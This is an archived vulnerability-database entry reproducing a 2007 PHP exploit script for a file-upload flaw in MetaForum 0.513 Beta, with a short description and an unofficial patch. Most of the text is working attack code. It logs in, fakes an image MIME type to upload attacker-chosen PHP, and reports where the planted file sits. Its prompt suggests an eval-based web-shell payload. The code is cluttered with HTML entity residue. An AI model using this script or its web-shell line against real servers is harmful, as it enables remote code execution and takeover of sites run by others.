Lucene search

K
seebugRootSSV:6424
HistoryMar 19, 2007 - 12:00 a.m.

MetaForum <= 0.513 Beta Remote File Upload Exploit

2007-03-1900:00:00
Root
www.seebug.org
14
metaforum
remote file upload
vulnerability
security bug
php
unofficial solution
advisory link
mime type
image
remote code execution

No description provided by source.


                                                <?php
/*---------------------------------------------------------*\\
MetaForum&nbsp;<=&nbsp;0.513&nbsp;Beta&nbsp;-&nbsp;Remote&nbsp;file&nbsp;upload&nbsp;Vulnerability

[|Description:|]
A&nbsp;security&nbsp;bug&nbsp;has&nbsp;been&nbsp;discovered&nbsp;in&nbsp;MetaForum&nbsp;0.513&nbsp;Beta.
This&nbsp;bug&nbsp;can&nbsp;be&nbsp;used&nbsp;by&nbsp;an&nbsp;attacker&nbsp;to&nbsp;upload&nbsp;a&nbsp;malicious&nbsp;php&nbsp;file&nbsp;on&nbsp;the&nbsp;server.
During&nbsp;the&nbsp;upload,&nbsp;the&nbsp;MIME&nbsp;type&nbsp;of&nbsp;the&nbsp;file&nbsp;is&nbsp;the&nbsp;only&nbsp;verified&nbsp;parameter.&nbsp;The&nbsp;extention&nbsp;isn\'t.
This&nbsp;enables&nbsp;a&nbsp;attacker&nbsp;to&nbsp;fake&nbsp;the&nbsp;MIME&nbsp;type&nbsp;of&nbsp;a&nbsp;php&nbsp;file&nbsp;so&nbsp;that&nbsp;it&nbsp;is&nbsp;considered&nbsp;as&nbsp;an&nbsp;image.

[|Advisory:|]
http://www.aeroxteam.fr/advisory-MetaForum-0.513b.txt

[|Solution:|]&nbsp;(unofficial)
Replace&nbsp;line&nbsp;110&nbsp;in&nbsp;the&nbsp;file&nbsp;usercp.php&nbsp;by:
if&nbsp;(($_FILES[\'imagefile\'][\'type\']&nbsp;==&nbsp;\"image/jpeg\"&nbsp;||&nbsp;$_FILES[\'imagefile\'][\'type\']&nbsp;==&nbsp;\"image/pjpeg\"&nbsp;||&nbsp;$_FILES[\'imagefile\'][\'type\']&nbsp;==&nbsp;\"image/png\"&nbsp;||&nbsp;$_FILES[\'imagefile\'][\'type\']&nbsp;==&nbsp;\"image/gif\")&nbsp;&&&nbsp;in_array(strtolower(substr(strrchr($_FILES[\'imagefile\'][\'name\'],&nbsp;\'.\'),1)),&nbsp;array(\'gif\',&nbsp;\'jpg\',&nbsp;\'jpeg\',&nbsp;\'png\')))

C0d3d&nbsp;by&nbsp;Gu1ll4um3r0m41n&nbsp;(aeroxteam&nbsp;--[at]--&nbsp;gmail&nbsp;--[dot]--&nbsp;com)
for&nbsp;AeroX&nbsp;&&nbsp;NeoAlpha&nbsp;(AeroXteam.fr&nbsp;--&nbsp;Neoalpha.fr)
(C)opyleft&nbsp;2007
Gr33tz:&nbsp;Math.,&nbsp;Syntax&nbsp;ERROR,&nbsp;Barma,&nbsp;NeoMorphS,&nbsp;Snake91,&nbsp;Spamm,&nbsp;Kad,&nbsp;Nitr0,&nbsp;Jethro&nbsp;And&nbsp;everybody&nbsp;from&nbsp;#aerox
\\*---------------------------------------------------------*/
if(count($argv)&nbsp;==&nbsp;6)&nbsp;{
	head();
	echo&nbsp;\"PHP&nbsp;code&nbsp;to&nbsp;write&nbsp;(ex:&nbsp;<?php&nbsp;eval(stripslashes(\\$_GET[\'cmd\']));&nbsp;?>)&nbsp;:\\r\\n\";
	$phpcode&nbsp;=&nbsp;trim(fgets(STDIN));
	echo&nbsp;\"\\r\\n[+]&nbsp;Connection...&nbsp;\";
	$sock&nbsp;=&nbsp;@fsockopen($argv[1],&nbsp;80,&nbsp;$eno,&nbsp;$estr,&nbsp;30);
	if&nbsp;(!$sock)&nbsp;{
		die(\"Failed\\r\\n\\r\\nCould&nbsp;not&nbsp;connect&nbsp;to&nbsp;\".$argv[1].\"&nbsp;on&nbsp;the&nbsp;port&nbsp;80&nbsp;!\");
	}
	echo&nbsp;\"OK\\r\\n\";
	echo&nbsp;\"[+]&nbsp;Login&nbsp;to&nbsp;account...&nbsp;\";
	$reqlogin&nbsp;=&nbsp;\"POST&nbsp;\".$argv[2].\"index.php?shard=login&action=proc_login&nbsp;HTTP/1.1\\r\\n\";
	$reqlogin&nbsp;.=&nbsp;\"Host:&nbsp;\".$argv[1].\"\\r\\n\";
	$reqlogin&nbsp;.=&nbsp;\"Accept:&nbsp;*/*\\r\\n\";
	$reqlogin&nbsp;.=&nbsp;\"Connection:&nbsp;Close\\r\\n\";
	$reqlogin&nbsp;.=&nbsp;\"Content-Type:&nbsp;application/x-www-form-urlencoded\\r\\n\";
	$reqlogin&nbsp;.=&nbsp;\"Content-Length:&nbsp;\".strlen(\"login_name=\".$argv[3].\"&login_pass=\".$argv[4]).\"\\r\\n\\r\\n\";
	$reqlogin&nbsp;.=&nbsp;\"login_name=\".$argv[3].\"&login_pass=\".$argv[4];
	fwrite($sock,&nbsp;$reqlogin);
	while(!feof($sock))&nbsp;{
		$buffer&nbsp;=&nbsp;fgets($sock);
		if(preg_match(\"`Set-Cookie:&nbsp;\".$argv[5].\"userID=(.*?);`\",&nbsp;$buffer,&nbsp;$idtmp))&nbsp;{&nbsp;$id&nbsp;=&nbsp;$idtmp[1];&nbsp;}
	}
	if(empty($id))&nbsp;{
		die(\"Failed\\r\\n\\r\\nCould&nbsp;not&nbsp;login&nbsp;as&nbsp;\".$argv[3].\"&nbsp;!\");
	}&nbsp;else&nbsp;{
		echo&nbsp;\"OK\\r\\n\";
	}
	fclose($sock);

	echo&nbsp;\"[+]&nbsp;Sending&nbsp;of&nbsp;the&nbsp;file...&nbsp;\";
	$sock&nbsp;=&nbsp;@fsockopen($argv[1],&nbsp;80,&nbsp;$eno,&nbsp;$estr,&nbsp;30);
	if&nbsp;(!$sock)&nbsp;{
		die(\"Failed\\r\\n\\r\\nCould&nbsp;not&nbsp;connect&nbsp;to&nbsp;\".$argv[1].\"&nbsp;on&nbsp;the&nbsp;port&nbsp;80&nbsp;!\");
	}
	$requp&nbsp;=&nbsp;\"POST&nbsp;\".$argv[2].\"index.php?shard=usercp&action=g_avatar&nbsp;HTTP/1.1\\r\\n\";
	$requp&nbsp;.=&nbsp;\"Host:&nbsp;\".$argv[1].\"\\r\\n\";
	$requp&nbsp;.=&nbsp;\"Accept:&nbsp;*/*\\r\\n\";
	$requp&nbsp;.=&nbsp;\"Connection:&nbsp;Close\\r\\n\";
	$requp&nbsp;.=&nbsp;\"Cookie:&nbsp;\".$argv[5].\"username=\".$argv[3].\";&nbsp;\".$argv[5].\"userID=\".$id.\";&nbsp;\".$argv[5].\"password=\".sha1($argv[4]).\"\\r\\n\";
	$requp&nbsp;.=&nbsp;\"Content-Type:&nbsp;multipart/form-data;&nbsp;boundary=--------------268742553814512\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"----------------268742553814512\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"Content-Disposition:&nbsp;form-data;&nbsp;name=\\\"upload_flag\\\";\\r\\n\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"true\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"----------------268742553814512\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"Content-Disposition:&nbsp;form-data;&nbsp;name=\\\"imagefile\\\";&nbsp;filename=\\\"owned.php\\\";\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"Content-Type:&nbsp;image/jpeg\\r\\n\\r\\n\";
	$requp2&nbsp;.=&nbsp;$phpcode.\"\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"----------------268742553814512\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"Content-Disposition:&nbsp;form-data;&nbsp;name=\\\"Submit\\\";\\r\\n\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"Submit\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"----------------268742553814512--\\r\\n\";
	$requp&nbsp;.=&nbsp;\"Content-Length:&nbsp;\".strlen($requp2).\"\\r\\n\\r\\n\";
	$requp&nbsp;.=&nbsp;$requp2;
	fwrite($sock,&nbsp;$requp);
	while(!feof($sock))&nbsp;{
		if(preg_match(\"`<img&nbsp;src=\'images/\".$argv[3].\".php\'`\",&nbsp;fgets($sock)))&nbsp;{&nbsp;$ok&nbsp;=&nbsp;1;&nbsp;}
	}
	if($ok&nbsp;==&nbsp;1)&nbsp;{
		echo&nbsp;\"OK\\r\\n\\r\\nYou&nbsp;can&nbsp;access&nbsp;the&nbsp;file&nbsp;at:\\r\\nhttp://\".$argv[1].$argv[2].\"images/\".$argv[3].\".php\\r\\n\\r\\nThank&nbsp;for&nbsp;using&nbsp;this&nbsp;exploit&nbsp;!\";
	}&nbsp;else&nbsp;{
		die(\"Failed\\r\\n\\r\\nMaybe&nbsp;not&nbsp;vulnerable&nbsp;?!\");
	}
}&nbsp;else&nbsp;{
	usage();
}
function&nbsp;usage()&nbsp;{
	echo&nbsp;\"+----------------------------------------------------------------+\\r\\n\";
	echo&nbsp;\"|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MetaForum&nbsp;<=&nbsp;0.513_beta&nbsp;Remote&nbsp;file&nbsp;upload&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|\\r\\n\";
	echo&nbsp;\"|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;By&nbsp;Gu1ll4um3r0m41n&nbsp;for&nbsp;AeroX&nbsp;&&nbsp;NeoAlpha&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|\\r\\n\";
	echo&nbsp;\"|&nbsp;Usage:&nbsp;php&nbsp;exploit.php&nbsp;site.com&nbsp;/path/&nbsp;user&nbsp;pass&nbsp;cookie_prefix&nbsp;|\\r\\n\";
	echo&nbsp;\"+----------------------------------------------------------------+\\r\\n\";
}
function&nbsp;head()&nbsp;{
	echo&nbsp;\"+----------------------------------------------+\\r\\n\";
	echo&nbsp;\"|&nbsp;&nbsp;MetaForum&nbsp;<=&nbsp;0.513_beta&nbsp;Remote&nbsp;file&nbsp;upload&nbsp;&nbsp;|\\r\\n\";
	echo&nbsp;\"|&nbsp;&nbsp;&nbsp;By&nbsp;Gu1ll4um3r0m41n&nbsp;for&nbsp;AeroX&nbsp;&&nbsp;NeoAlpha&nbsp;&nbsp;&nbsp;&nbsp;|\\r\\n\";
	echo&nbsp;\"+----------------------------------------------+\\r\\n\\r\\n\";
}
?>